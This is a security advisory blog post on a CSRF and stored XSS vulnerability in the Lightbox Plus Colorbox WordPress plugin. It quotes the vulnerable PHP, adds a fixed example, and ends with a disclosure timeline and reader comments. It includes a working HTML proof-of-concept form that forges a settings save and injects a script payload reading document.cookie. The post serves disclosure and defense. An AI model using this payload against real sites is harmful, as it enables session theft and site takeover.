Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in Lightbox Plus Colorbox
We recently discovered that the Lightbox Plus Colorbox plugin has a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability in version 2.7.2, and some prior versions, on the page /wp-admin/themes.php?page=lightboxplus.
No nonce is included on the page, so a forged request that saves the plugin's settings is accepted; that is the CSRF issue.
For the XSS issue, in the file /lightboxplus.php starting at line 326, the submitted settings are saved straight from $_POST without any sanitization:

    case 'settings':
        $lightboxPlusOptions = array(
            "lightboxplus_multi" => $_POST['lightboxplus_multi'],
            "use_inline"         => $_POST['use_inline'],
            "inline_num"         => $_POST['inline_num'],
            "lightboxplus_style" => $_POST['lightboxplus_style'],
            "use_custom_style"   => $_POST['use_custom_style'],
            "disable_css"        => $_POST['disable_css'],
            "hide_about"         => $_POST['hide_about'],
            "output_htmlv"       => $_POST['output_htmlv'],
            "data_name"          => $_POST['data_name'],
            ...
When the stored values are output on the settings page through the file /admin/lightbox.admin.php they are not escaped. For example, the value for width is output on line 504 directly into an HTML attribute:

    <input type="text" size="15" name="width" id="width" value="<?php if ( !empty( $lightboxPlusOptions['width'] )) { echo $lightboxPlusOptions['width'];} else { echo ''; } ?>" />
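For comparison, here is what the save and output paths described above look like with the two missing controls in place: a nonce that is emitted in the form and verified on submission (closing the CSRF hole), and per-field sanitization on save plus attribute escaping on output (closing the XSS hole). This is an added example written for this post, not code from the plugin or its author; the function and option names are assumptions, and only a handful of the plugin's option keys are shown.

```php
<?php
// Added example, not the plugin's own code. Names prefixed lbp_example_ are assumptions.

// --- Saving: check the nonce and capability, then sanitize each field by type ---
function lbp_example_save_settings() {
    // Only users who may manage options should be able to save these settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Dies unless the POST carried a valid nonce for this action. A form hosted on an
    // attacker's site cannot include it, so the forged request from the PoC is rejected.
    check_admin_referer( 'lbp_example_save_settings', 'lbp_example_nonce' );

    $options = array(
        // Free-text field: strip tags, control characters and stray whitespace.
        'data_name'   => sanitize_text_field( wp_unslash( $_POST['data_name'] ?? '' ) ),
        // Numeric fields: coerce to a non-negative integer; the PoC payload becomes 0.
        'width'       => absint( $_POST['width'] ?? 0 ),
        'inline_num'  => absint( $_POST['inline_num'] ?? 0 ),
        // Checkbox-style fields: store a boolean, never the raw submitted string.
        'use_inline'  => ! empty( $_POST['use_inline'] ) ? 1 : 0,
        'disable_css' => ! empty( $_POST['disable_css'] ) ? 1 : 0,
    );
    update_option( 'lbp_example_options', $options );
}

// --- Rendering: emit the nonce field and escape every value placed into HTML ---
function lbp_example_render_settings_form() {
    $options = get_option( 'lbp_example_options', array() );
    $width   = isset( $options['width'] ) ? $options['width'] : '';
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'lbp_example_save_settings', 'lbp_example_nonce' ); ?>
        <input type="hidden" name="action" value="action" />
        <input type="hidden" name="sub" value="settings" />
        <!-- esc_attr() encodes the double quote in a payload such as the PoC's
             "><script>...</script> as &quot;, so it can no longer close the attribute -->
        <input type="text" size="15" name="width" id="width"
               value="<?php echo esc_attr( $width ); ?>" />
        <?php submit_button(); ?>
    </form>
    <?php
}
```

Both layers matter here. Input sanitization alone is not enough, because the XSS is stored: any payload saved before a fix is deployed is still sitting in the options table, so the output path must escape regardless of how the value got there. Likewise, escaping alone leaves the CSRF issue intact, since an attacker could still silently change the lightbox settings even without script execution.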
Proof of Concept
The following proof of concept will cause an alert box showing any cookies accessible to JavaScript to be displayed on the page. In the Firefox web browser this happens right after you hit the Submit button. Other major web browsers have XSS filtering that blocks the reflected response, so in those the alert will only be shown if you return to /wp-admin/themes.php?page=lightboxplus after having submitted the form, because the payload has been stored in the plugin's settings.
Make sure to replace “[path to WordPress]” with the location of WordPress.
    <html>
    <head>
    </head>
    <body>
    <form name="lightboxplus_settings" method="post" action="http://[path to WordPress]/wp-admin/admin.php?page=lightboxplus&updated=settings">
    <input type="hidden" name="action" value="action" />
    <input type="hidden" name="sub" value="settings" />
    <input type="hidden" name="width" value='"><script>alert(document.cookie);</script>' />
    <input type="submit" value="Submit" />
    </form>
    </body>
    </html>
Timeline
- 3/29/2016 – Developer notified.
- 4/5/2016 – WordPress Plugin Directory notified.
- 4/5/2016 – Plugin removed from WordPress Plugin Directory.
Hey Thanks – I totally didn’t see the email (or the other email). Will update the plugin as soon as possible (1-2 days with my current schedule)
Thanks again,
Dan
Thank you for sharing this information. When the plugin vanished from the repo I was confused but could not find any info on what had happened.
Pingback: Vida y muerte de un plugin de WordPress: Lightbox Plus Colorbox by Dan Zappone – MrFoxTalbot
Because lightbox colorbox is so entrenched on what I am doing, what can I do to disable the admin area that causes this vulnerability in the code? Can I comment out the bad code in the lightboxplus.php? Can you give example of what to do?
Looking for a short term solution to eliminate the vulnerability, even if it means I have to comment and uncomment the bad code to make changes in the admin. I don’t anticipate though ever having to change settings in Colorbox again.
Any help here greatly appreciated!
That is exactly the kind of help we provide through our service, so if you sign up we can help you with this.
Through our main website we also offer a service to take over and maintain plugins that have been abandoned, as this appears to have been, and that includes securing the plugin.